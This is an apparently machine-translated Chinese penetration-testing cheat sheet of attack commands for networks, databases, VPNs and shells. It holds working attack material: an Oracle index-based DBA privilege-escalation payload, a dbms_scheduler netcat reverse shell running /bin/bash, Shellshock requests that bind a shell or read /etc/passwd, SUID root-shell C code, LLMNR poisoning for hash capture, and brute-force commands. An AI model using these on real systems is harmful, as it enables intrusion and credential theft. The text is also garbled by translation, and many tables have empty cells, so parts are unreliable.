渗透测试工具作弊表,典型穿透测试工作的快速参考高级概述。设计为快速参考作弊表,提供执行渗透测试时将运行的典型命令的高级概述。对于更深入的信息,我会从右侧的菜单中推荐该工具的man文件或更具体的笔测试作弊表。
该作弊表的重点是基础架构/网络渗透测试,除了最后的几个sqlmap命令和一些Web服务器枚举之外,Web应用程序渗透测试不在此处。
17/02/2017 - 文章更新,加载更多内容,VPN,DNS隧道,VLAN跳跃等 - 查看下面的TOC。
介绍
更新日志
预啮合
设置IP地址
子网划分
网络配置
OSINT
DNS
WHOIS枚举
执行DNS IP查找
执行MX记录查找
用DIG执行区域传输
被动信息收集
DNS区域转移
DNS暴力
端口扫描
DNSRecon
Nmap UDP扫描
UDP协议扫描器
其他主机发现
Nmap命令
基本手指印刷
横幅抓NC
简单电子邮件
电子邮件
半主动信息收集
活动信息收集
枚举和攻击网络服务
指定特定用户名
显示所有登录用户的Solaris错误:
RSH枚举
RSH运行命令
Metasploit RSH登录扫描仪
rusers显示登录用户
rusers扫描整个子网
SNMPv3枚举
Metasploit LLMNR / NetBIOS请求
Responder.py
桑巴枚举
SMB枚举工具
指纹SMB版本
查找打开的SMB共享
枚举SMB用户
手动空会话测试:
NBTS可以unixwiz
SAMB / SMB / Windows域枚举
LLMNR / NBT-NS欺骗
SNMP枚举
R服务枚举
手指枚举
rwho中
TLS和SSL测试
testssl.sh
漏洞评估
数据库渗透测试
Bruteforce MSSQL登录
Metasploit MSSQL Shell
指纹Oracle TNS版本
强力oracle用户帐号
Oracle特权升级
使用NMAP NSE脚本识别oracle数据库中的默认帐户:
如何识别oracle用户的当前权限级别:
Oracle priv esc并获取DBA访问权限:
使用select查询运行漏洞:
删除漏洞利用:
获取Oracle Reverse os-shell:
神谕
MSSQL
网络
攻击机
IKEForce
IKE侵略模式PSK破解
PPTP黑客
步骤1:Idenitfy IKE服务器
步骤2:使用IKEForce枚举组名
步骤3:使用ike-scan来捕获PSK散列
步骤4:使用psk-crack来破解PSK哈希
NMAP PPTP指纹:
PPTP字典攻击
有级IP范围
IPv4私有地址范围
IPv4子网作弊表
SSH枢轴
Meterpreter枢轴
Plink.exe隧道
旋转
TTL手指打印
IPv4作弊表
VLAN跳跃
VPN黑客
DNS隧道
BOF / Exploit
利用研究
利用贝壳
猫文件(查看文件内容)
Shell Shock运行绑定shell
壳牌反击壳
搜索漏洞利用
在Kali编译Windows漏洞
交叉编译漏洞
利用常见的漏洞
简单的本地Web服务器
挂载文件共享
HTTP / HTTPS Web服务器枚举
包检测
用户名称枚举
SMB用户枚举
SNMP用户枚举
密码
生词
强制服务
Hydra FTP暴力
九头蛇POP3暴力
Hydra SMTP暴力
密码破解
约翰开膛手 - JTR
Windows渗透测试命令
Linux渗透测试命令
编译漏洞
识别C代码是否适用于Windows或Linux
构建利用GCC
GCC编译32位攻击64位Kali
在Linux上编译Windows .exe
SUID二进制
SUID C Shell / bin / bash
SUID C Shell / bin / sh
构建SUID Shell二进制文件
反向壳牌
TTY Shells
Python TTY Shell Trick
Spawn交互式sh shell
Spawn Perl TTY Shell
Spawn Ruby TTY Shell
Spawn Lua TTY壳牌
来自Vi的Spawn TTY Shell
Spawn TTY Shell NMAP
Metasploit的
Meterpreter有效载荷
Windows反向计量器有效载荷
Windows VNC Meterpreter有效载荷
Linux反向Meterpreter有效载荷
Meterpreter作弊表
常见的Metasploit模块
远程Windows Metasploit模块(exploits)
本地Windows Metasploit模块(exploits)
辅助Metasploit模块
Metasploit Powershell模块
后利用Windows Metasploit模块
ASCII表作弊表
CISCO IOS命令
加密
哈希长度
哈希示例
SQLMap示例
ifconfig eth0 xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx/24 ipcalc xxx.xxx.xxx.xxx 255.255.255.0
whois domain-name-here.com
dig a domain-name-here.com @nameserver
dig mx domain-name-here.com @nameserver
dig axfr domain-name-here.com @nameserver
命令 | 描述 |
---|---|
|
Windows DNS区域传输 |
|
Linux DNS区域传输 |
使用简单的电子邮件枚举所有在线的地方(github,目标网站等),如果您使用代理或设置较长的节流时间,Google将不会认为您是机器人,并填写验证码,那么它的效果会更好。
git clone https://github.com/killswitch-GUI/SimplyEmail.git./SimplyEmail.py -all -e TARGET-DOMAIN
简单电子邮件可以在收集后验证发现的电子邮件地址。
手动手指/横幅抓取。
命令 | 描述 |
---|---|
|
通过显示横幅进行基本版本/手指打印 |
nc TARGET-IP 80GET / HTTP/1.1Host: TARGET-IPUser-Agent: Mozilla/5.0Referrer: meh-domain
DNS枚举Kali - DNSRecon
root:〜# dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
有关更多命令,请参阅Nmap作弊表(右侧菜单中的链接)。
基本Nmap命令:
命令 | 描述 |
---|---|
|
Nmap详细扫描,运行syn隐身,T4定时(在LAN上应该可以),OS和服务版本信息,traceroute和脚本对服务 |
|
如上所述,扫描所有TCP端口(需要更长的时间) |
|
如上所述,扫描所有TCP端口和UDP扫描(需要更长时间) |
|
用于扫描易受攻击的SMB服务器的Nmap脚本 - 警告:不安全= 1可能会导致死机 |
|
搜索关键字的nmap脚本 |
nmap -sU TARGET
git clone https://github.com/portcullislabs/udp-proto-scanner.git
扫描所有服务的IP地址文件:
./udp-protocol-scanner.pl -f ip.txt
扫描特定的UDP服务:
udp-proto-scanner.pl -p ntp -f ips.txt
主机发现的其他方法,不使用nmap ...
命令 | 描述 |
---|---|
|
从ARP发现子网上的IP,MAC地址和MAC供应商,有助于确认您在$客户端站点处于正确的VLAN |
将专门识别和/或枚举网络服务的工具:
nmblookup -A targetsmbclient //MOUNT/share -I target -Nrpcclient -U "" targetenum4linux target
另请参阅,nbtscan作弊表(右手菜单)。
命令 | 描述 |
---|---|
|
在子网上查找Windows / Samba服务器,查找Windows MAC地址,netbios名称并发现客户端工作组/域 |
|
做一切,运行所有选项(查找Windows客户端域/工作组)除了基于字典的共享名称猜测 |
smbclient -L //192.168.1.100
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
RID骑自行车:
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
用于RID循环的Metasploit模块:
use auxiliary/scanner/smb/smb_lookupsid
视窗:
net use \\TARGET\IPC$ "" /u:""
Linux的:
smbclient -L //192.168.99.131
安装在卡利滚动:
apt-get install nbtscan-unixwiz nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan
从网络窃取凭据。
欺骗/毒药LLMNR / NetBIOS请求:
auxiliary/spoof/llmnr/llmnr_responseauxiliary/spoof/nbns/nbns_response
捕获散列:
auxiliary/server/capture/smbauxiliary/server/capture/http_ntlm
你最终会遇到NTLMv2哈希,使用john或者hashcat来破解它。
或者,您可以使用响应者。
git clone https://github.com/SpiderLabs/Responder.gitpython Responder.py -i local-ip -I eth0
在处理其他攻击向量时,请运行Responder.py来达成一致。
修复SNMP输出值,使其可读取:
apt-get install snmp-mibs-downloader download-mibsecho "" > /etc/snmp/snmp.conf
命令 | 描述 |
---|---|
|
SNMP枚举 |
带有nmap的Idenitfy SNMPv3服务器:
nmap -sV -p 161 --script=snmp-info TARGET-SUBNET
Rory McCune的snmpwalk包装脚本有助于自动化SNMPv3的用户名列表过程:
apt-get install snmp snmp-mibs-downloaderwget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
Metasploit的wordlist(以下的KALI路径)具有SNMP v1 v1和v2的共同凭据,对于较新的凭据,请查看Daniel Miessler在GitHub上的SecLists项目(不是邮件列表!)。
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
这是遗产,包括为完整性。
nmap -A将执行下面列出的所有rservices枚举,此部分是为了完整性或手动确认而添加的:
rsh
auxiliary/scanner/rservices/rsh_login
rusers -al 192.168.2.1
rlogin -l
例如rlogin -l root TARGET-SUBNET / 24
finger @TARGET-IP
finger batman@TARGET-IP
finger 0@host SunOS: RPC services allow user enum:$ rusers # users logged onto LANfinger 'a b c d e f g h'@sunhost
使用nmap来识别运行rwhod(513 UDP)的机器
测试单个主机上的所有内容并输出到.html文件:
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html
在Kali上安装OpenVAS 8滚动:
apt-get updateapt-get dist-upgrade -yapt-get install openvasopenvas-setup
验证openvas正在运行:
netstat -tulpn
登录https://127.0.0.1:9392 - 凭据在openvas-setup期间生成。
攻击在网络上暴露的数据库服务器。
安装示波器:
apt-get install oscanner
运行示波器:
oscanner -s 192.168.1.200 -P 1521
安装tnscmd10g:
apt-get install tnscmd10g
指纹oracle tns:
tnscmd10g version -h TARGETnmap --script=oracle-tns-version
识别默认Oracle帐户:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
对Oracle TNS运行nmap脚本:
nmap -p 1521 -A TARGET
要求:
Oracle需要在网络上公开
默认帐户正在使用,如scott
快速概述如何运作:
创建功能
在表SYS.DUAL上创建一个索引
我们刚刚创建的索引执行我们的函数SCOTT.DBA_X
该功能将由SYS用户执行(因为该用户拥有该表)。
创建一个帐户与DBA priveleges
在下面的示例中,用户SCOTT被使用,但是应该可以使用另一个默认的Oracle帐户。
nmap --script=oracle-sid-brute nmap --script=oracle-brute
使用识别的弱帐户登录(假设您找到一个)。
SQL> select * from session_privs; SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid curren_user is pragma autonomous_transaction; begin execute immediate 'grant dba to user1 identified by pass1';commit;return 'FOO';end;
运行netcat:netcat -nvlp 443
code>
SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
SQL> Select * from session_privs;
您应该有一个具有creds user1和pass1的DBA用户。
通过重新运行第一个命令,验证您是否具有DBA权限。
drop index exploit_1337;
begindbms_scheduler.create_job( job_name => 'MEH1337',job_type =>
'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE); dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');dbms_scheduler.enable('rev_shell'); end;
枚举/发现:
NMAP:
nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156
Metasploit的:
msf > use auxiliary/scanner/mssql/mssql_ping
尝试使用“浏览更多”通过MS SQL Server Management Studio
msf > use auxiliary/admin/mssql/mssql_enum
msf > use exploit/windows/mssql/mssql_payloadmsf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PuTTY Link隧道
将远程端口转发到本地地址:
plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP
ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip
在/etc/proxychains.conf中添加socks4 127.0.0.1 1010
SSH从一个网络转向另一个网络:
ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1
在/etc/proxychains.conf中添加socks4 127.0.0.1 1010
proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2
在/etc/proxychains.conf中添加socks4 127.0.0.1 1011
操作系统 | TTL大小 |
---|---|
视窗 |
|
Linux的 |
|
的Solaris |
|
思科/网络 |
|
例如A,B,C(折旧)
类 | IP地址范围 |
---|---|
A类IP地址范围 |
|
B类IP地址范围 |
|
C类IP地址范围 |
|
D类IP地址范围 |
|
E类IP地址范围 |
|
类 | 范围 |
---|---|
A类私人地址范围 |
|
B类私人地址范围 |
|
C类私人地址范围 |
|
|
|
CIDR | 小数面膜 | 主机数量 |
---|---|---|
/ 31 |
|
|
/ 30 |
|
|
/ 29 |
|
|
/ 28 |
|
|
/ 27 |
|
|
/ 26 |
|
|
/ 25 |
|
|
/ 24 |
|
|
/ 23 |
|
|
/ 22 |
|
|
/ 21 |
|
|
/ 20 |
|
|
/ 19 |
|
|
/ 18 |
|
|
/ 17 |
|
|
/ 16 |
|
|
/ 15 |
|
|
/ 14 |
|
|
/ 13 |
|
|
/ 12 |
|
|
/ 11 |
|
|
/ 10 |
|
|
/ 9 |
|
|
/ 8 |
|
|
使用NCCGroups Yersina的VLAN封装脚本简化了过程。
git clone https://github.com/nccgroup/vlan-hopping.gitchmod 700 frogger.sh./frogger.sh
识别VPN服务器:
./udp-protocol-scanner.pl -p ike TARGET(s)
扫描VPN服务器的范围:
./udp-protocol-scanner.pl -p ike -f ip.txt
使用IKEForce枚举或字典攻击VPN服务器。
安装:
pip install pyipgit clone https://github.com/SpiderLabs/ikeforce.git
使用IKEForce执行IKE VPN枚举:
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
使用IKEForce的Bruteforce IKE VPN:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scanike-scan TARGET-IPike-scan -A TARGET-IPike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
识别VPN服务器
枚举使用IKEForce获取组ID
使用ike-scan从IKE端点捕获PSK散列
使用psk-crack来破解哈希
./udp-protocol-scanner.pl -p ike SUBNET/24
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
psk-crack hash-file.txt
一些更高级的psk-crack选项如下:
pskcrackpsk-crack -b 5 TARGET-IPkeypsk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134keypsk-crack -d /path/to/dictionary-file TARGET-IP-key
识别PPTP,它监听TCP:1723
nmap –Pn -sV -p 1723 TARGET(S)
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
通过DNS隧道传输数据以绕过防火墙。
dnscat2支持“下载”和“上传”用于从目标机器获取文件(数据和程序)的命令。
制作安装:
apt-get updateapt-get -y install ruby-dev git make g++gem install bundlergit clone https://github.com/iagox86/dnscat2.gitcd dnscat2/serverbundle install
运行dnscat2:
ruby ./dnscat2.rbdnscat2> New session established: 1422dnscat2> session -i 1422
目标机:
https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/
dnscat --host
查找枚举主机/服务的漏洞。
命令 | 描述 |
---|---|
|
搜索exploit-db for exploit,在这个例子中为windows 2003 + local esc |
|
使用谷歌搜索exploit-db.com的漏洞 |
|
搜索metasploit模块使用grep - msf搜索有一点 |
安装exploit-db的本地副本:
searchsploit –u
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
gcc -m32 -o output32 hello.c (32 bit)gcc -m64 -o output hello.c (64 bit)
用于查找和利用易受Shellshock攻击的服务器的工具:
git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
nc -l -p 443
Python本地Web服务器命令,方便在攻击机器上提供shell和exploit。
命令 | 描述 |
---|---|
|
运行基本的http服务器,非常适合提供shell等 |
|
运行基本的Python3 http服务器,非常适合提供shell等 |
|
运行ruby webrick基本的http服务器 |
|
运行基本的PHP http服务器 |
如何挂载NFS / CIFS,Windows和Linux文件共享。
命令 | 描述 |
---|---|
|
挂载NFS共享到 |
|
在Linux上安装Windows CIFS / SMB共享, |
|
从命令行在Windows上安装Windows共享 |
|
在Kali上安装smb4k,用于浏览SMB共享的有用的Linux GUI |
命令 | 描述 |
---|---|
|
对目标执行nikto扫描 |
|
通过GUI进行配置,CLI输入大部分时间不起作用 |
命令 | 描述 |
---|---|
|
接口eth0上端口80的tcpdump输出到output.pcap |
一些技术用于远程枚举目标系统上的用户。
命令 | 描述 |
---|---|
|
枚举来自SMB的用户 |
|
RID循环SMB /枚举来自SMB的用户 |
命令 | 描述 |
---|---|
|
从SNMP中吸引用户 |
|
从SNMP中吸引用户 |
|
搜索具有nmap,grepable输出的SNMP服务器 |
命令 | 描述 |
---|---|
|
卡利词列表 |
命令 | 描述 |
---|---|
|
Hydra FTP暴力 |
命令 | 描述 |
---|---|
|
九头蛇POP3暴力 |
命令 | 描述 |
---|---|
|
九头蛇SMTP暴力 |
使用-t
限制并发连接,例如:-t 15
命令 | 描述 |
---|---|
|
JTR密码破解 |
|
JTR强制用wordlist进行破解 |
|
JTR强制描述强力开裂 |
请参阅Windows渗透测试命令。
有关Linux渗透测试命令的列表,请参阅Linux命令作弊表(右键菜单),对本地系统枚举有用。
关于编译漏洞的一些注释。
C #include将指出应该使用哪个操作系统来构建漏洞。
命令 | 描述 |
---|---|
|
Windows漏洞利用代码 |
|
Linux漏洞代码 |
编译漏洞gcc
命令 | 描述 |
---|---|
|
基本GCC编译 |
用于在64位攻击机上交叉编译32位二进制文件。
命令 | 描述 |
---|---|
|
在64位Linux上交叉编译32位二进制文件 |
在Linux上构建/编译Windows漏洞,导致一个.exe文件。
命令 | 描述 |
---|---|
|
在Linux上编译windows .exe |
通常,SUID C二进制文件需要以超级用户身份生成shell,您可以根据需要更新UID / GID和shell。
以下是各种贝壳的一些快速复制和例子:
int main(void){
setresuid(0, 0, 0);
system("/bin/bash");}
int main(void){
setresuid(0, 0, 0);
system("/bin/sh");}
gcc -o suid suid.c
对于32位:
gcc -m32 -o suid suid.c
有关有用的反向Shell的列表,请参阅反向Shell作弊表。
从Linux中的有限外壳生成TTY shell的技巧/技巧,对于运行像su
反向shell 这样的命令非常有用。
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
exec "/bin/sh";perl —e 'exec "/bin/sh";'
exec "/bin/sh"
os.execute('/bin/sh')
从vi运行shell命令:
:!bash
!sh
一些基本的Metasploit的东西,我已经找到方便的参考。
基本Metasploit命令,有助于参考,用于旋转参见 - Meterpreter枢转技术。
命令 | 描述 |
---|---|
|
Windows反向tcp有效载荷 |
命令 | 描述 |
---|---|
|
Meterpreter Windows VNC有效载荷 |
命令 | 描述 |
---|---|
|
Meterpreter Linux反向有效负载 |
有用的抄表命令。
命令 | 描述 |
---|---|
|
Meterpreter将文件上传到Windows目标 |
|
Meterpreter从Windows目标下载文件 |
|
Meterpreter从Windows目标下载文件 |
|
Meterpreter在目标上运行.exe,方便执行上传的漏洞利用 |
|
用cmd shell创建新通道 |
|
仪表显示过程 |
|
Meterpreter在目标上获取shell |
|
Meterpreter尝试特权升级目标 |
|
Meterpreter尝试将哈希值转储到目标上 |
|
Meterpreter将端口创建到目标机器 |
|
Meterpreter向前删除端口 |
顶层metasploit模块。
命令 | 描述 |
---|---|
|
MS08_067 Windows 2k,XP,2003 Remote Exploit |
|
MS08_040 Windows NT,2k,XP,2003 Remote Exploit |
|
MS09_050 Windows Vista SP1 / SP2和Server 2008(x86)远程漏洞利用 |
命令 | 描述 |
---|---|
|
在Windows 7上绕过UAC +设置目标+ arch,x86 / 64 |
命令 | 描述 |
---|---|
|
Metasploit HTTP目录扫描器 |
|
Metasploit JBOSS漏洞扫描器 |
|
Metasploit MSSQL凭证扫描仪 |
|
Metasploit MSSQL版本扫描仪 |
|
Metasploit Oracle登录模块 |
命令 | 描述 |
---|---|
|
Metasploit powershell有效载荷传递模块 |
|
Metasploit上传并通过会话运行powershell脚本 |
|
Metasploit JBOSS部署 |
|
Metasploit MSSQL有效载荷 |
Windows Metasploit模块用于特权升级。
命令 | 描述 |
---|---|
|
Metasploit显示当前用户的特权 |
|
Metasploit抓GPP保存密码 |
|
Metasplit负载Mimikatz |
|
Idenitfy提供的域用户具有管理访问权限的其他计算机 |
|
自动转储sam文件,尝试esc权限等 |
有用的Web应用程序渗透测试,或者如果您在火星上搁浅,需要与NASA进行通信。
ASCII | 字符 |
---|---|
|
空字节 |
|
BS |
|
标签 |
|
LF |
|
CR |
|
退出 |
|
SPC |
|
! |
|
“ |
|
# |
|
$ |
|
% |
|
& |
|
` |
|
( |
|
) |
|
* |
|
+ |
|
, |
|
- |
|
。 |
|
/ |
|
0 |
|
1 |
|
2 |
|
3 |
|
4 |
|
五 |
|
6 |
|
7 |
|
8 |
|
9 |
|
: |
|
; |
|
< |
|
= |
|
> |
|
? |
|
@ |
|
一个 |
|
乙 |
|
C |
|
ð |
|
Ë |
|
F |
|
G |
|
H |
|
一世 |
|
Ĵ |
|
ķ |
|
大号 |
|
中号 |
|
ñ |
|
Ø |
|
P |
|
Q |
|
[R |
|
小号 |
|
Ť |
|
ü |
|
V |
|
w ^ |
|
X |
|
ÿ |
|
ž |
|
[ |
|
\ |
|
] |
|
^ |
|
_ |
|
` |
|
一个 |
|
b |
|
C |
|
ð |
|
Ë |
|
F |
|
G |
|
H |
|
一世 |
|
Ĵ |
|
ķ |
|
升 |
|
米 |
|
ñ |
|
Ø |
|
p |
|
q |
|
[R |
|
小号 |
|
Ť |
|
ü |
|
v |
|
w ^ |
|
X |
|
ÿ |
|
ž |
一组有用的Cisco IOS命令。
命令 | 描述 |
---|---|
|
进入启用模式 |
|
短路,配置终端 |
|
配置FastEthernet 0/0 |
|
将ip添加到fa0 / 0 |
|
将ip添加到fa0 / 0 |
|
配置vty行 |
|
思科设置telnet密码 |
|
设置telnet密码 |
|
显示内存中加载的运行配置 |
|
显示sartup配置 |
|
显示cisco IOS版本 |
|
显示开放会话 |
|
显示网络接口 |
|
显示详细的界面信息 |
|
显示路线 |
|
显示访问列表 |
|
显示可用的文件 |
|
文件信息 |
|
SHOW已删除的文件 |
|
终端输出无限制 |
|
复制运行配置到tftp服务器 |
|
将startup-config复制到running-config |
哈希 | 尺寸 |
---|---|
MD5哈希长度 |
|
SHA-1哈希长度 |
|
SHA-256哈希长度 |
|
SHA-512哈希长度 |
|
可能只是使用哈希标识符,但这里有一些示例散列:
哈希 | 例 |
---|---|
MD5哈希示例 |
|
MD5 $ PASS:$ SALT示例 |
|
MD5 $ SALT:$ PASS |
|
SHA1哈希示例 |
|
SHA1 $ PASS:$ SALT |
|
SHA1 $ SALT:$ PASS |
|
SHA-256 |
|
SHA-256 $ PASS:$ SALT |
|
SHA-256 $ SALT:$ PASS |
|
SHA-512 |
|
SHA-512 $ PASS:$ SALT |
|
SHA-512 $ SALT:$ PASS |
|
NTLM哈希示例 |
|
命令 | 描述 |
---|---|
|
自动sqlmap扫描 |
|
目标sqlmap扫描 |
|
扫描url for union +基于错误的注入与mysql后端 |
|
用于注入的sqlmap检查表单 |
|
数据库名称上的表用户的sqlmap转储和破解散列。 |